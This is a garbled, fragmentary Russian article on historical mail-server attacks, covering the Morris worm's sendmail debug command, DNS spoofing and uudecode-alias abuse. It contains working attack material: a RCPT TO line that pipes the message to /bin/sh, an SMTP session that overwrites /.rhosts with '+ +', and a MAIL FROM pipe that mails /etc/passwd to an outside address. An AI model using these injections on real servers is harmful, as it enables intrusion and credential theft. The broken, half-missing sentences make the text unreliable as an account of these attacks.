ALTE DOCUMENTE
|
|||||||
Чер& 20320j920u #1074;ь Морриса
uudecode
Internet
DNS
aserver com bob@bserver.com DNS IP bserver com SMTP , она сможет сфальсифицировать ответ DNS bserver com
DNS UDP UDP . Идентификатор представляет собой 16-битовое значение, поэтому, послав всего лишь 216 пакетов, Ева может быть уверена, что один из них жертва воспримет как ответ от настоящего DNS
DNS DNS , здесь же достаточно заметить - если в e mail IP kpnc@195.161.42.222 .
PGP
SendMail
SMTP
send_text(s, "debug");
#define MAIL_FROM "mail from:</dev/null>\n"
#define MAIL_RCPT "rcpt to:<\"| sed \'1,/^$/d\' | /bin/sh ; exit 0\">\n"
send_text(s, MAIL_FROM);
i = (random() & 0x00FFFFFF);
sprintf(l548,MAIL_RCPT, i, i);
send_text(s, l548);
Некто (имени которого история не сохранила) обратил внимание, что у многих почтовых серверов в файле «/etc/aliases» содержится строка приблизительного следующего содержания: «decode: |/usr/bin/uudecode». Если послать на такой сервер письмо, адресованное получателю «decode uudecode UUE
UUE
Таким образом, закодированный текст состоит из следующих символов (и только из них): `!"#$%&'()*+,-./012356789:;<=>?@ABC...XYZ[\]^_, каждый из которых может быть передан по любым телекоммуникационным каналам, в том числе и семибитовым.
UUE
begin 644 filename
=D>JEJR"AKJ'@H"`M(.&OH.$@I*7@I:*N(0T``0(`
end
filename
SendMail uudecode файл в системе.
rhosts rhosts и имен пользователей, которым с этих самых узлов разрешен вход на сервер без предъявления пароля. А комбинация «+ +» открывает свободный доступ пользователям со узлов сети.
cat > tmp
^C
; uue-кодирование, с указанием раскодировать этот файл в /.rhosts
% uuencode tmp /.rhosts
begin 644 /.rhosts
$*R`K"@``
end
telnet 127.0.0.1 25
220 kpnc.krintel.ru SimpleSMTP 1.0 Sun, 26 Mar 2000 16:42:49 +0400
helo kpnc
250 kpnc.krintel.ru Hello kpnc.krintel.ru [195.161.41.239]
mail from: kpnc@kpnc.krintel.ru
250 kpnc Sender ok
; Указание псевдонима 'decode' в качестве имени получателя
rcpt to: decode
250 decode Recipient ok
data
354 Enter mail, end with "." on a line by itself
begin 644 /.rhosts
$*R`K"@``
end
250 Ok
quit
221 kpnc.krintel.ru closing connection
graffiti
. Защита файла от перезаписи (в тех случаях, когда она есть) не панацея - злоумышленник может создать файл, поместив его, например, в такую папку как «Автозагрузка». Рано или поздно система запустит его, и код злоумышленника получит управление.
MAIL FROM RCPT TO open Perl его, если в имени присутствует символ "|", обозначающий вызов конвейера.
UNIX
SendMail включительно содержал множество ошибок, одна из которых продемонстрирована ниже (знаком ";" обозначены комментарии):
telnet kpnc.krintel.ru 25
220 target.com Sendmail 5.55 ready at Sun, 26 Mar 2000 16:51:12
helo kpnc
250 kpnc.krintel.ru Hello kpnc.krintel.ru [195.161.41.239]
; Использование конвейера в поле MAIL FROM. Следующая команда пересылает содержимое файла паролей по
mail from: "|/bin/mail kpnc@hotmail.com < /etc/passwd"
250 "|/bin/mail kpnc@hotmail.com < /etc/passwd"... Sender ok
rcpt to: user12345
550 user12345... User unknown
data
354 Enter mail, end with "." on a line by itself
250 Mail accepted
quit
DATA RCPT TO
SMTP сервере MMDF версии 2.44a-B4, работающего под управлением SCO-UNIX MAIL FROM RPPT TO root
POP SMTP сервере ZetaMail версии 2.1. Пароль, передаваемый командой "PASS
x SMTP-шлюза Interscan VirusWall, работающего под управлением Windows NT. На этот раз переполнение буфера происходило во время приветствия сервера командой "HELO
», оказалось способным принести своим обладателям значительно больший ущерб, чем тот, что доставляет типичный вирус.
Примерно в то же самое время обнаружилась уязвимость IMAIL POP USER". Такую же участь разделил Avirt Mail Server (версии 3.3a, 3.5). Сообщение о возможности переполнении буфера командой "PASS
IP
|